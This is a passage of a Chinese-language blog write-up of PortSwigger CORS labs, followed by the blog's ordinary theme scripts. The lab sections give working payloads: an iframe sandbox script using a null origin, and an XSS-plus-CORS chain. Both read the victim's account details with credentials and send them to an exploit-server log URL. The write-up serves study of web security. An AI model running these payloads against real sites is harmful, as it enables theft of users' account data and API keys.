<li><code>req.open(&#39;get&#39;,&#39;YOUR-LAB-ID.web-security-academy.net/accountDetails&#39;,true);</code>：使用 GET 方法打开了一个与指定 URL 的异步（true 表示异步）HTTP 连接。该 URL 是一个包含用户账户详情的资源。</li>
<li><code>req.withCredentials = true;</code>：设置了 XMLHttpRequest 对象的 withCredentials 属性为 true。这表示在请求中会包含凭据（如 cookie、授权标头等），从而允许在跨域请求中发送身份验证信息。</li>
<li><code>req.send();</code>：发送了 HTTP 请求到指定的 URL</li>
</ol>
<p>保存之后便可以将其发送给受害者，然后查看日志，获取到管理员的API，题目解决</p>
<h3 id="Lab：具有受信任的-null-源的-CORS-漏洞"><a href="#Lab：具有受信任的-null-源的-CORS-漏洞" class="headerlink" title="Lab：具有受信任的 null 源的 CORS 漏洞"></a>Lab：具有受信任的 null 源的 CORS 漏洞</h3><p>首先按照上题的方法一样检查是否有CORS漏洞，与上题不一样的是这题我们在<code>Origin</code>处输入任意一个链接的话响应体里面不会回显<code>Access-Control-Allow-Origin</code>，但是当我们输入null的时候，回显成功，如下：<br><img src="/../imgs/$%7Bfiilname%7D/image-20240328200418197.png" alt="image-20240328200418197"></p>
<p>回显的这两条证明了还是存在CORS漏洞的，不过需要用常见的第三种情况里面的方法，到bp给我们提供的漏洞利用服务器中，并在其中的html代码的body部分输入以下代码：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">sandbox</span>=<span class="string">&quot;allow-scripts allow-top-navigation allow-forms&quot;</span> <span class="attr">srcdoc</span>=<span class="string">&quot;&lt;script&gt;</span></span></span><br><span class="line"><span class="string"><span class="tag">    var req = new XMLHttpRequest();</span></span></span><br><span class="line"><span class="string"><span class="tag">    req.onload = reqListener;</span></span></span><br><span class="line"><span class="string"><span class="tag">    req.open(&#x27;get&#x27;,&#x27;YOUR-LAB-ID.web-security-academy.net/accountDetails&#x27;,true);</span></span></span><br><span class="line"><span class="string"><span class="tag">    req.withCredentials = true;</span></span></span><br><span class="line"><span class="string"><span class="tag">    req.send();</span></span></span><br><span class="line"><span class="string"><span class="tag">    function reqListener() &#123;</span></span></span><br><span class="line"><span class="string"><span class="tag">        location=&#x27;YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key=&#x27;+encodeURIComponent(this.responseText);</span></span></span><br><span class="line"><span class="string"><span class="tag">    &#125;;</span></span></span><br><span class="line"><span class="string"><span class="tag">&lt;/script&gt;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>注意使用 iframe 沙盒，因为这会生成 null 源请求</p>
<p>接下来按上题操作，题目解决</p>
<h3 id="Lab：具有受信任不安全协议的-CORS-漏洞"><a href="#Lab：具有受信任不安全协议的-CORS-漏洞" class="headerlink" title="Lab：具有受信任不安全协议的 CORS 漏洞"></a>Lab：具有受信任不安全协议的 CORS 漏洞</h3><p>按照上面两题的步骤操作发现响应体中都回显不出<code>Access-Control-Allow-Origin</code>标头，于是根据题目提示尝试子域名，结果如下：</p>
<p><img src="/../imgs/$%7Bfiilname%7D/image-20240328210126691.png" alt="image-20240328210126691"></p>
<p>发现接受本域名以及子域名，还是存在CORS漏洞的</p>
<p>打开产品页面，点击检查库存，并观察它是否使用子域上的 HTTP URL 加载（请注意，该 <code>productID</code> 参数容易受到 XSS 的影响）</p>
<p>于是到bp提供的漏洞利用服务器中，输入如下代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">    document.location=&quot;http://stock.0a58005104085dbd81d52570007b00a4.web-security-academy.net/?productId=4&lt;script&gt;var req = new XMLHttpRequest(); req.onload = reqListener; req.open(&#x27;get&#x27;,&#x27;https://0a58005104085dbd81d52570007b00a4.web-security-academy.net/accountDetails&#x27;,true); req.withCredentials = true;req.send();function reqListener() &#123;location=&#x27;https://exploit-0abd005e04c25dbc818624a201780074.exploit-server.net/log?key=&#x27;%2bthis.responseText; &#125;;%3c/script&gt;&amp;storeId=1&quot;</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>最好就不要再整理（我整理格式之后尝试不出来），这段代码的功能是首先将页面重定向到一个特定的URL，然后使用XMLHttpRequest对象向另一个URL发送GET请求，获取账户详情信息。当请求完成时，会将响应内容作为参数拼接到另一个URL中，并将页面重定向到该URL</p>
<p>接下来按照第一题那样继续操作，最后会得到管理员的API，题目解决</p>
</article>
<div class="article-footer">
    <section id="license">
      <div class="header"><span>License</span></div>
      <div class="body"><p>本文采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">署名-非商业性使用-相同方式共享 4.0 国际</a> 许可协议，转载请注明出处。</p>
</div>
    </section>
    

</div>

<div class="related-wrap" id="read-next"><section class="body"><div class="item" id="prev"><div class="note">Newer</div><a href="/2024/03/30/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%B7%E9%A2%98/">命令执行刷题</a></div><div class="item" id="next"><div class="note">Older</div><a href="/2024/03/21/KalmarCTF-2024-Web-Challenges/">KalmarCTF 2024 Web Challenges</a></div></section></div>






<footer class="page-footer footnote"><hr><div class="text"><p>本站由 <a href="/">Sherlock</a> 使用 <a target="_blank" rel="noopener" href="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.33.1">Stellar 1.33.1</a> 主题创建。<br>本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议，转载请注明出处。</p>
</div></footer>
<div class="main-mask" onclick="sidebar.dismiss()"></div></div><aside class="l_right">
<div class="widgets">



<widget class="widget-wrapper toc" id="data-toc" collapse="false"><div class="widget-header dis-select"><span class="name">On This Page</span><a class="cap-action" onclick="sidebar.toggleTOC()" ><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg></a></div><div class="widget-body"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E5%87%A0%E7%A7%8D%E6%83%85%E5%86%B5"><span class="toc-text">常见的几种情况</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E7%A7%8D%EF%BC%8CAllow-Origin%E4%B8%BA-%EF%BC%8CAllow-Credentials%E4%B8%BA-true"><span class="toc-text">第一种，Allow-Origin为 * ，Allow-Credentials为 true</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E7%A7%8D%EF%BC%8CAllow-Origin%E4%B8%BA-%EF%BC%8CAllow-Credentials%E4%B8%BA-true"><span class="toc-text">第二种，Allow-Origin为&lt;all-host&gt; ，Allow-Credentials为 true&lt;&#x2F;all-host&gt;</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%89%E7%A7%8D%EF%BC%8CAllow-Origin%E4%B8%BAnull%EF%BC%8CAllow-Credentials%E4%B8%BAtrue"><span class="toc-text">第三种，Allow-Origin为null，Allow-Credentials为true</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E6%88%98"><span class="toc-text">实战</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Lab%EF%BC%9A%E5%85%B7%E6%9C%89%E5%9F%BA%E6%9C%AC%E6%BA%90%E5%8F%8D%E5%B0%84%E7%9A%84-CORS-%E6%BC%8F%E6%B4%9E"><span class="toc-text">Lab：具有基本源反射的 CORS 漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Lab%EF%BC%9A%E5%85%B7%E6%9C%89%E5%8F%97%E4%BF%A1%E4%BB%BB%E7%9A%84-null-%E6%BA%90%E7%9A%84-CORS-%E6%BC%8F%E6%B4%9E"><span class="toc-text">Lab：具有受信任的 null 源的 CORS 漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Lab%EF%BC%9A%E5%85%B7%E6%9C%89%E5%8F%97%E4%BF%A1%E4%BB%BB%E4%B8%8D%E5%AE%89%E5%85%A8%E5%8D%8F%E8%AE%AE%E7%9A%84-CORS-%E6%BC%8F%E6%B4%9E"><span class="toc-text">Lab：具有受信任不安全协议的 CORS 漏洞</span></a></li></ol></li></ol></div><div class="widget-footer"><a class="top" onclick="util.scrollTop()"><svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><!-- Icon from Solar by 480 Design - https://creativecommons.org/licenses/by/4.0/ --><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="1.5"><path stroke-linejoin="round" d="m9 15.5l3-3l3 3m-6-4l3-3l3 3"/><path d="M7 3.338A9.95 9.95 0 0 1 12 2c5.523 0 10 4.477 10 10s-4.477 10-10 10S2 17.523 2 12c0-1.821.487-3.53 1.338-5"/></g></svg><span>Scroll to Top</span></a></div></widget>
</div></aside><div class='float-panel'>
  <button type='button' style='display:none' class='laptop-only rightbar-toggle mobile' onclick='sidebar.rightbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg>
  </button>
  <button type='button' style='display:none' class='mobile-only leftbar-toggle mobile' onclick='sidebar.leftbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-width="1.5"><path d="M2 11c0-3.771 0-5.657 1.172-6.828C4.343 3 6.229 3 10 3h4c3.771 0 5.657 0 6.828 1.172C22 5.343 22 7.229 22 11v2c0 3.771 0 5.657-1.172 6.828C19.657 21 17.771 21 14 21h-4c-3.771 0-5.657 0-6.828-1.172C2 18.657 2 16.771 2 13z"/><path id="sep" stroke-linecap="round" d="M5.5 10h6m-5 4h4m4.5 7V3"/></g></svg>
  </button>
</div>
</div><div class="scripts">


<script type="text/javascript">
  window.canonical = {"originalHost":null,"officialHosts":["localhost"],"encoded":""};
  const ctx = {
    date_suffix: {
      just: `Just`,
      min: `minutes ago`,
      hour: `hours ago`,
      day: `days ago`,
    },
    root : `/`,
    tag_plugins: {
      chat: Object.assign({"api":"https://siteinfo.listentothewind.cn/api/v1"}),
    }
  };

  // required plugins (only load if needs)
  if (`local_search`) {
    ctx.search = {};
    ctx.search.service = `local_search`;
    if (ctx.search.service == 'local_search') {
      let service_obj = Object.assign({}, `{"field":"all","path":"/search.json","content":true,"skip_search":null,"sort":"-date"}`);
      ctx.search[ctx.search.service] = service_obj;
    }
  }
  const def = {
    avatar: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/3442075.svg`,
    cover: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/cover/76b86c0226ffd.svg`,
    loading: `https://api.iconify.design/eos-icons:three-dots-loading.svg?color=%231cd0fd`,
  };
  const deps = {
    jquery: `https://gcore.jsdelivr.net/npm/jquery@3.7/dist/jquery.min.js`,
    marked: `https://gcore.jsdelivr.net/npm/marked@13.0/lib/marked.umd.min.js`,
    lazyload: `/%5Bobject%20Object%5D`
  }
  

</script>

<script type="text/javascript">
  
  function RunItem() {
    this.list = []; // 存放回调函数
    this.start = () => {
      for (var i = 0; i < this.list.length; i++) {
        this.list[i].run();
      }
    };
    this.push = (fn, name, setRequestAnimationFrame = true) => {
      let myfn = fn
      if (setRequestAnimationFrame) {
        myfn = () => {
          utils.requestAnimationFrame(fn)
        }
      }
      var f = new Item(myfn, name);
      this.list.push(f);
    };
    this.remove = (name) => {
      for (let index = 0; index < this.list.length; index++) {
        const e = this.list[index];
        if (e.name == name) {
          this.list.splice(index, 1);
        }
      }
    }
    // 构造一个可以run的对象
    function Item(fn, name) {
      // 函数名称
      this.name = name || fn.name;
      // run方法
      this.run = () => {
        try {
          fn()
        } catch (error) {
          console.log(error);
        }
      };
    }
  }

  const utils = {
    // 懒加载 css https://github.com/filamentgroup/loadCSS
    css: (href, before, media, attributes) => {
      var doc = window.document;
      var ss = doc.createElement("link");
      var ref;
      if (before) {
        ref = before;
      } else {
        var refs = (doc.body || doc.getElementsByTagName("head")[0]).childNodes;
        ref = refs[refs.length - 1];
      }
      var sheets = doc.styleSheets;
      if (attributes) {
        for (var attributeName in attributes) {
          if (attributes.hasOwnProperty(attributeName)) {
            ss.setAttribute(attributeName, attributes[attributeName]);
          }
        }
      }
      ss.rel = "stylesheet";
      ss.href = href;
      ss.media = "only x";
      function ready(cb) {
        if (doc.body) {
          return cb();
        }
        setTimeout(function () {
          ready(cb);
        });
      }
      ready(function () {
        ref.parentNode.insertBefore(ss, before ? ref : ref.nextSibling);
      });
      var onloadcssdefined = function (cb) {
        var resolvedHref = ss.href;
        var i = sheets.length;
        while (i--) {
          if (sheets[i].href === resolvedHref) {
            return cb();
          }
        }
        setTimeout(function () {
          onloadcssdefined(cb);
        });
      };
      function loadCB() {
        if (ss.addEventListener) {
          ss.removeEventListener("load", loadCB);
        }
        ss.media = media || "all";
      }
      if (ss.addEventListener) {
        ss.addEventListener("load", loadCB);
      }
      ss.onloadcssdefined = onloadcssdefined;
      onloadcssdefined(loadCB);
      return ss;
    },

    js: (src, opt) => new Promise((resolve, reject) => {
      var script = document.createElement('script');
      if (src.startsWith('/')) {
        src = ctx.root + src.substring(1);
      }
      script.src = src;
      if (opt) {
        for (let key of Object.keys(opt)) {
          script[key] = opt[key]
        }
      } else {
        // 默认异步，如果需要同步，第二个参数传入 {} 即可
        script.async = true
      }
      script.onerror = reject
      script.onload = script.onreadystatechange = function () {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    }),

    jq: (fn) => {
      if (typeof jQuery === 'undefined') {
        utils.js(deps.jquery).then(fn)
      } else {
        fn()
      }
    },

    onLoading: (el) => {
      if (el) {
        $(el).append('<div class="loading-wrap"><svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" stroke-opacity=".3" d="M12 3C16.9706 3 21 7.02944 21 12C21 16.9706 16.9706 21 12 21C7.02944 21 3 16.9706 3 12C3 7.02944 7.02944 3 12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="1.3s" values="60;0"/></path><path stroke-dasharray="15" stroke-dashoffset="15" d="M12 3C16.9706 3 21 7.02944 21 12"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.3s" values="15;0"/><animateTransform attributeName="transform" dur="1.5s" repeatCount="indefinite" type="rotate" values="0 12 12;360 12 12"/></path></g></svg></div>');
      }
    },
    onLoadSuccess: (el) => {
      if (el) {
        $(el).find('.loading-wrap').remove();
      }
    },
    onLoadFailure: (el) => {
      if (el) {
        $(el).find('.loading-wrap svg').remove();
        $(el).find('.loading-wrap').append('<svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" d="M12 3L21 20H3L12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.5s" values="60;0"/></path><path stroke-dasharray="6" stroke-dashoffset="6" d="M12 10V14"><animate fill="freeze" attributeName="stroke-dashoffset" begin="0.6s" dur="0.2s" values="6;0"/></path></g><circle cx="12" cy="17" r="1" fill="currentColor" fill-opacity="0"><animate fill="freeze" attributeName="fill-opacity" begin="0.8s" dur="0.4s" values="0;1"/></circle></svg>');
        $(el).find('.loading-wrap').addClass('error');
      }
    },
    request: (el, url, callback, onFailure) => {
      const maxRetry = 3;
      let retryCount = 0;

      return new Promise((resolve, reject) => {
        const load = () => {
          utils.onLoading?.(el);

          let timedOut = false;
          const timeout = setTimeout(() => {
            timedOut = true;
            console.warn('[request] 超时:', url);

            if (++retryCount >= maxRetry) {
              utils.onLoadFailure?.(el);
              onFailure?.();
              reject('请求超时');
            } else {
              setTimeout(load, 1000);
            }
          }, 5000);

          fetch(url).then(resp => {
            if (timedOut) return;
            clearTimeout(timeout);

            if (!resp.ok) throw new Error('响应失败');
            return resp;
          }).then(data => {
            if (timedOut) return;
            utils.onLoadSuccess?.(el);
            callback(data);
            resolve(data);
          }).catch(err => {
            clearTimeout(timeout);
            console.warn('[request] 错误:', err);

            if (++retryCount >= maxRetry) {
              utils.onLoadFailure?.(el);
              onFailure?.();
              reject(err);
            } else {
              setTimeout(load, 1000);
            }
          });
        };

        load();
      });
    },
    requestWithoutLoading: (url, options = {}, maxRetry = 2, timeout = 5000) => {
      return new Promise((resolve, reject) => {
        let retryCount = 0;

        const tryRequest = () => {
          let timedOut = false;
          const timer = setTimeout(() => {
            timedOut = true;
            if (++retryCount > maxRetry) reject('timeout');
            else tryRequest();
          }, timeout);

          fetch(url, options)
            .then(resp => {
              clearTimeout(timer);
              if (!resp.ok) throw new Error('bad response');
              resolve(resp);
            })
            .catch(err => {
              clearTimeout(timer);
              if (++retryCount > maxRetry) reject(err);
              else setTimeout(tryRequest, 500);
            });
        };

        tryRequest();
      });
    },
    /********************** requestAnimationFrame ********************************/
    // 1、requestAnimationFrame 会把每一帧中的所有 DOM 操作集中起来，在一次重绘或回流中就完成，并且重绘或回流的时间间隔紧紧跟随浏览器的刷新频率，一般来说，这个频率为每秒60帧。
    // 2、在隐藏或不可见的元素中，requestAnimationFrame 将不会进行重绘或回流，这当然就意味着更少的的 cpu，gpu 和内存使用量。
    requestAnimationFrame: (fn) => {
      if (!window.requestAnimationFrame) {
        window.requestAnimationFrame = window.requestAnimationFrame || window.mozRequestAnimationFrame || window.webkitRequestAnimationFrame;
      }
      window.requestAnimationFrame(fn)
    },
    dark: {},
  };

  // utils.dark.mode 当前模式 dark or light
  // utils.dark.toggle() 暗黑模式触发器
  // utils.dark.push(callBack[,"callBackName"]) 传入触发器回调函数
  utils.dark.method = {
    toggle: new RunItem(),
  };
  utils.dark = Object.assign(utils.dark, {
    push: utils.dark.method.toggle.push,
  });
</script>
<script>
  const sidebar = {
    leftbar: () => {
      if (l_body) {
        l_body.toggleAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    rightbar: () => {
      if (l_body) {
        l_body.toggleAttribute('rightbar');
        l_body.removeAttribute('leftbar');
      }
    },
    dismiss: () => {
      if (l_body) {
        l_body.removeAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    toggleTOC: () => {
      document.querySelector('#data-toc').classList.toggle('collapse');
    }
  }
</script>
<script type="text/javascript">
  (() => {
    const tagSwitchers = document.querySelectorAll('.tag-subtree.parent-tag > a > .tag-switcher-wrapper')
    for (const tagSwitcher of tagSwitchers) {
      tagSwitcher.addEventListener('click', (e) => {
        const parent = e.target.closest('.tag-subtree.parent-tag')
        parent.classList.toggle('expanded')
        e.preventDefault()
      })
    }

    // Get active tag from query string, then activate it.
    const urlParams = new URLSearchParams(window.location.search)
    const activeTag = urlParams.get('tag')
    if (activeTag) {
      let tag = document.querySelector(`.tag-subtree[data-tag="${activeTag}"]`)
      if (tag) {
        tag.querySelector('a').classList.add('active')
        
        while (tag) {
          tag.classList.add('expanded')
          tag = tag.parentElement.closest('.tag-subtree.parent-tag')
        }
      }
    }
  })()
</script>

<script async src="https://gcore.jsdelivr.net/npm/vanilla-lazyload@19.1/dist/lazyload.min.js"></script>
<script>
  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazy",
    callback_loaded: (el) => {
      el.classList.add('loaded');
      const wrapper = el.closest('.lazy-box');
      const icon = wrapper?.querySelector('.lazy-icon');
      if (icon) icon.remove();
    }
  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  document.addEventListener('DOMContentLoaded', function () {
    window.lazyLoadInstance?.update();
  });

  window.wrapLazyloadImages = (container) => {
    if (typeof container === 'string') {
      container = document.querySelector(container);
    }
    if (!container) return;
    
    const images = container.querySelectorAll('img');
    images.forEach((img) => {
      if (img.classList.contains('lazy')) return;

      const src = img.getAttribute('src');
      if (!src) return;

      const wrapper = document.createElement('div');
      wrapper.className = 'lazy-box';

      const newImg = img.cloneNode();
      newImg.removeAttribute('src');
      newImg.setAttribute('data-src', src);
      newImg.classList.add('lazy');

      const icon = document.createElement('div');
      icon.className = 'lazy-icon';
      if (def.loading) {
        icon.style.backgroundImage = `url("${def.loading}")`;
      }

      wrapper.appendChild(newImg);
      wrapper.appendChild(icon);

      img.replaceWith(wrapper);
    });

    // 通知 LazyLoad 更新
    if (window.lazyLoadInstance?.update) {
      window.lazyLoadInstance.update();
    }
  }
  
</script>

<!-- required -->
<script src="/js/main.js?v=1.33.1" defer></script>

<script type="text/javascript">
  const applyTheme = (theme) => {
    if (theme === 'auto') {
      document.documentElement.removeAttribute('data-theme')
    } else {
      document.documentElement.setAttribute('data-theme', theme)
    }

    // applyThemeToGiscus(theme)
  }

  // FIXME: 这会导致无法使用 preferred_color_scheme 以外的主题
  const applyThemeToGiscus = (theme) => {
    // theme = theme === 'auto' ? 'preferred_color_scheme' : theme
    const cmt = document.getElementById('giscus')
    if (cmt) {
      // This works before giscus load.
      cmt.setAttribute('data-theme', theme)
    }

    const iframe = document.querySelector('#comments > section.giscus > iframe')
    if (iframe) {
      // This works after giscus loaded.
      const src = iframe.src
      const newSrc = src.replace(/theme=[\w]+/, `theme=${theme}`)
      iframe.src = newSrc
    }
  }

  const switchTheme = () => {
    // light -> dark -> auto -> light -> ...
    const currentTheme = document.documentElement.getAttribute('data-theme')
    let newTheme;
    switch (currentTheme) {
      case 'light':
        newTheme = 'dark'
        break
      case 'dark':
        newTheme = 'auto'
        break
      default:
        newTheme = 'light'
    }
    applyTheme(newTheme)
    window.localStorage.setItem('Stellar.theme', newTheme)
    utils.dark.mode = newTheme === 'auto' ? (window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light") : newTheme;
    utils.dark.method.toggle.start();

    const messages = {
      light: `Switched to Light Mode`,
      dark: `Switched to Dark Mode`,
      auto: `Switched to Auto Mode`,
    }
    hud?.toast?.(messages[newTheme])
  }

  (() => {
    // Apply user's preferred theme, if any.
    const theme = window.localStorage.getItem('Stellar.theme')
    if (theme !== null) {
      applyTheme(theme)
    } else {
      utils.dark.mode = window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light";
    }
    utils.dark.method.toggle.start();
  })()
</script>


<!-- optional -->



<script defer>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.services = Object.assign({}, JSON.parse(`{"mdrender":{"js":"/js/services/mdrender.js"},"siteinfo":{"js":"/js/services/siteinfo.js","api":null},"ghinfo":{"js":"/js/services/ghinfo.js"},"rating":{"js":"/js/services/rating.js","api":"https://star-vote.xaox.cc/api/rating"},"vote":{"js":"/js/services/vote.js","api":"https://star-vote.xaox.cc/api/vote"},"sites":{"js":"/js/services/sites.js"},"friends":{"js":"/js/services/friends.js"},"friends_and_posts":{"js":"/js/services/friends_and_posts.js"},"timeline":{"js":"/js/services/timeline.js"},"fcircle":{"js":"/js/services/fcircle.js"},"weibo":{"js":"/js/services/weibo.js"},"memos":{"js":"/js/services/memos.js"},"voice":{"js":"/js/plugins/voice.js"},"video":{"js":"/js/plugins/video.js"},"download-file":{"js":"/js/plugins/download-file.js"},"twikoo":{"js":"/js/services/twikoo_latest_comment.js"},"waline":{"js":"/js/services/waline_latest_comment.js"},"artalk":{"js":"/js/services/artalk_latest_comment.js"},"giscus":{"js":"/js/services/giscus_latest_comment.js"},"contributors":{"edit_this_page":{"_posts/":null,"wiki/stellar/":"https://github.com/xaoxuu/hexo-theme-stellar-docs/blob/main/"},"js":"/js/services/contributors.js"}}`));
    for (let id of Object.keys(ctx.services)) {
      const js = ctx.services[id].js;
      if (id == 'siteinfo') {
        ctx.cardlinks = document.querySelectorAll('a.link-card[cardlink]');
        if (ctx.cardlinks?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            setCardLink(ctx.cardlinks);
          });
        }
      } else if (id == 'voice') {
        ctx.voiceAudios = document.querySelectorAll('.voice>audio');
        if (ctx.voiceAudios?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            createVoiceDom(ctx.voiceAudios);
          });
        }
      } else if (id == 'video') {
        ctx.videos = document.querySelectorAll('.video>video');
        if (ctx.videos?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            videoEvents(ctx.videos);
          });
        }
      } else if (id == 'download-file') {
        ctx.files = document.querySelectorAll('.file');
        if (ctx.files?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            downloadFileEvent(ctx.files);
          });
        }
      } else {
        const els = document.getElementsByClassName(`ds-${id}`);
        if (els?.length > 0) {
          utils.jq(() => {
            if (id == 'timeline' || 'memos' || 'marked') {
              utils.js(deps.marked).then(function () {
                utils.js(js, { defer: true });
              });
            } else {
              utils.js(js, { defer: true });
            }
          });
        }
      }
    }

    // chat iphone time
    let phoneTimes = document.querySelectorAll('.chat .status-bar .time');

    if (phoneTimes.length > 0) {
      NowTime();
      var date = new Date();
      var sec = date.getSeconds();
      var firstAdjustInterval = setInterval(firstAdjustTime, 1000 * (60 - sec));
    }

    function firstAdjustTime() {
      NowTime();
      clearInterval(firstAdjustInterval);
      setInterval(NowTime, 1000 * 60);
    }

    function NowTime() {
      for (let i = 0; i < phoneTimes.length; ++i) {
        var timeSpan = phoneTimes[i];
        var date = new Date();
        var hour = date.getHours();
        var min = date.getMinutes();
        timeSpan.innerHTML = check(hour) + ":" + check(min);
      }
    };

    function check(val) {
      if (val < 10) {
        return ("0" + val);
      }
      return (val);
    }

    // chat quote
    const chat_quote_obverser = new IntersectionObserver((entries, observer) => {
      entries.filter((entry) => { return entry.isIntersecting }).sort((a, b) => a.intersectionRect.y !== b.intersectionRect.y ? a.intersectionRect.y - b.intersectionRect.y : a.intersectionRect.x - b.intersectionRect.x).forEach((entry, index) => {
          observer.unobserve(entry.target);
          setTimeout(() => {
            entry.target.classList.add('quote-blink');
            setTimeout(() => {
              entry.target.classList.remove('quote-blink');
            }, 1000);
          }, Math.max(100, 16) * (index + 1));
        });
    });

    var chatQuotes = document.querySelectorAll(".chat .talk .quote");
    chatQuotes.forEach((quote) => {
      quote.addEventListener('click', function () {
        var chatCellDom = document.getElementById("quote-" + quote.getAttribute("quotedCellTag"));
        if (chatCellDom) {
          var chatDiv = chatCellDom.parentElement;
          var mid = chatDiv.clientHeight / 2;
          var offsetTop = chatCellDom.offsetTop;
          if (offsetTop > mid - chatCellDom.clientHeight / 2) {
            chatDiv.scrollTo({
              top: chatCellDom.offsetTop - mid + chatCellDom.clientHeight / 2,
              behavior: "smooth"
            });
          } else {
            chatDiv.scrollTo({
              top: 0,
              behavior: "smooth"
            });
          }
          chat_quote_obverser.observe(chatCellDom);
        }
      });
    });
  });
</script>

<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.search = {
      path: `/search.json`,
    }
    utils.js('/js/search/local-search.js', { defer: true });
  });
</script><script>
  window.FPConfig = {
    delay: 0,
    ignoreKeywords: [],
    maxRPS: 5,
    hoverDelay: 25
  };
</script>
<script defer src="https://gcore.jsdelivr.net/npm/flying-pages@2/flying-pages.min.js"></script><script>
  ctx.fancybox = {
    selector: `.timenode p>img`,
    css: `https://gcore.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.css`,
    js: `https://gcore.jsdelivr.net/npm/@fancyapps/ui@5.0/dist/fancybox/fancybox.umd.js`
  };
  var selector = '[data-fancybox]:not(.error), .with-fancybox .atk-content img:not([atk-emoticon])';
  if (ctx.fancybox.selector) {
    selector += `, ${ctx.fancybox.selector}`
  }
  var needFancybox = document.querySelectorAll(selector).length !== 0;
  if (!needFancybox) {
    const memos = document.getElementsByClassName('ds-memos');
    if (memos != undefined && memos.length > 0) {
      needFancybox = true;
    }
    const fancybox = document.getElementsByClassName('with-fancybox');
    if (fancybox != undefined && fancybox.length > 0) {
      needFancybox = true;
    }
  }
  if (needFancybox) {
    utils.css(ctx.fancybox.css);
    utils.js(ctx.fancybox.js, { defer: true }).then(function () {
      Fancybox.bind(selector, {
        hideScrollbar: false,
        Thumbs: {
          autoStart: false,
        },
        caption: (fancybox, slide) => {
          return slide.triggerEl.alt || slide.triggerEl.dataset.caption || null
        }
      });
    })
  }
</script>
<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    const swiper_api = document.getElementById('swiper-api');
